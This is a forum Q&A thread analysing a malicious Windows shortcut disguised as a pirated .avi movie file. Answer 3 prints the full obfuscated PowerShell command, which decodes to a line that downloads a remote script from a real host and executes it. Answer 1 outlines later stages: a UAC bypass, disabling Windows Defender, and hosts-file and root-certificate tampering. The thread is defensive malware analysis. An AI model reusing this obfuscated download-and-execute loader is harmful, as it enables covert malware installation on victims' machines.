Is this is a malware invocation of Powershell?

Question

I got a file that was .avi at the fist glance, but then I found out that in fact this is a .lnk file, but it was too late.

And the target element attribute of that file is C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

The starting point is: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

I created String out of following ASCII codes and it seems that it is a BASE64 format of Hallo World!. It seems very confusing to me as I couldn't find NoPr, Wind and eXEc parameters anywhere in the docs of Powershell, additionaly for some reason the file had size of 700MB until I removed .avi value from file description field.

Do you know what this file could try to do?

Answer 1

This is definitely malware!

Basically this is a malware with multiple stages. So far I have gone through:

Stage 1 (the .lnk file)

Downloads and executes powershell code from http://zvd.us/1

Stage 2

The downloaded powershell code contains a verbatim copy of https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1, which seems to be some UAC bypass. It then downloads and executes (as admin) a batch file.

Stage 3

The batch file first tries to disable all Windows Defender components (drivers, scheduled tasks, autorun entries) and adds group policies to that effect. It then downloads and executes 2 files. I will post virus total links to the files.

1. https://www.virustotal.com/#/file/29ea855339856181c2419b9573b8fd7aafb55b5d1cc0d5c9cb2648e2ef2582f7
2. https://www.virustotal.com/#/file/6055ef00b9b5f1d7a5c05ef9649d367bab071db3736d8dca2bac67d0afe768de

The first seems to be a recognised malware. Whereas the second is an NSIS installer which I have yet to analyze fully. It seems replace the systems hosts file with it's own, redirecting many domains to 80.241.222.137 and it installs a root certificate.

Answer 2

@zoredache seems to have the jist. It's just executing the command in a window with noprofile loaded with execution policy in bypass mode (don't require code signing).

You can test with the following (I've added the 3 parenthesis at the end but I feel something is missing.)

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

No idea what that code is but I think the idea was to concatenate DEC ASCII character codes into a string. Your "Hallo World!" appears to be off the mark from what I can tell. For starters, there's a lot more characters in the string that you've got.

http://www.asciitable.com/ would suggest the following:

SUB _ M N F RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m G M J [ S DLE p [ J DLE i Z \ } R

Answer 3

I got a bit further with this, as the same just happened on my partner's computer. The LNK file's target is actually much longer than what fits in the box in the properties window. With linkanalyzer I retrieved the full target:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

In the above command, everything up to the |. creates a list of numbers, does some sort of binary XOR operation on each of the numbers, then joins the result as a string. I believe this is a way of obfuscating code. The result is:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

This then gets piped into ( $EnV:coMsPeC[4,24,25]-jOiN'').

COMSPEC is the command line interpreter, but I don't know what the [4,24,25]-jOiN part is supposed to do. In the best case it just downloads the URL in the DownloadString function and that's all; in the worst case it downloads something then executes that. I'm not brave enough to follow the URL.

All in all I would say this does look very much like malware, but it would be great if someone with experience in powershell could comment.

Answer 4

Malware. Hidden in

https://thepiratebay.rocks/torrent/26213608/Bohemian_Rhapsody_2018.720p.DVDRip.x264.DTS-1XBET

Found this thread via google. This is going to be virus/malware etc and will most likely screw your PC. It's attached to various large files on PirateBay and hides code that will install crap on your PC. DON'T run it. Delete immediately. This is in PirateBay 'Bohemian Rhapsody 2018.avi' movie but the 700mg file is just space, it's really a symbolic link/shortcut to crap. Check the properties tab.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82